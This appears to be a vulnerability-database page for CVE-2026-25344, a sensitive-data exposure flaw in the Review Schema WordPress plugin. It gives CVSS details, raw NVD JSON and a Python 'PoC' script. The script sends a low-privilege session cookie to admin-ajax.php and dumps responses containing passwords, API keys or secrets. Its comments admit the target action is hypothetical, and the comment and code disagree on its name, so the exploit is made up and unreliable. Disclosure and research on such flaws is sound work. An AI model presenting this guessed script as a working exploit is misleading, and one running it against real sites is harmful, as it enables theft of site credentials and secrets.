Security Vulnerability Report
中文
CVE-2026-25344 CVSS 6.5 MEDIUM

CVE-2026-25344

Published: 2026-03-25 17:16:45
Last Modified: 2026-04-24 16:32:54

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in RadiusTheme Review Schema review-schema allows Retrieve Embedded Sensitive Data.This issue affects Review Schema: from n/a through <= 2.2.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

RadiusTheme Review Schema <= 2.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Review Schema < 2.2.6 - Sensitive Data Exposure PoC # Date: 2026-03-25 # Exploit Author: Security Analyst # Target configuration (replace with actual target) target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker cookies (low privilege user session) cookies = { "wordpress_logged_in_xxx": "attacker_cookie_value" } # Payload attempting to access sensitive data # Note: The specific action parameter 'review_schema_export' is hypothetical # based on the vulnerability description of retrieving embedded data. payload = { "action": "review_schema_export_data", "security": "" # Some plugins may require a nonce, often bypassable in this vuln } try: print("[+] Sending request to target...") response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request successful. Checking for sensitive data exposure...") # Check if response contains JSON or sensitive keys if "password" in response.text or "api_key" in response.text or "secret" in response.text: print("[!] Potential sensitive data found:") print(response.text) else: print("[-] Data does not appear to be sensitive, or exploit failed.") print("Response:", response.text[:200]) else: print(f"[-] Server returned HTTP {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25344", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:45.070", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in RadiusTheme Review Schema review-schema allows Retrieve Embedded Sensitive Data.This issue affects Review Schema: from n/a through <= 2.2.6."}, {"lang": "es", "value": "Exposición de Información Sensible del Sistema a una Esfera de Control No Autorizada vulnerabilidad en RadiusTheme Review Schema review-schema permite Recuperar Datos Sensibles Incrustados. Este problema afecta a Review Schema: desde n/a hasta &lt;= 2.2.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/review-schema/vulnerability/wordpress-review-schema-plugin-2-2-6-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}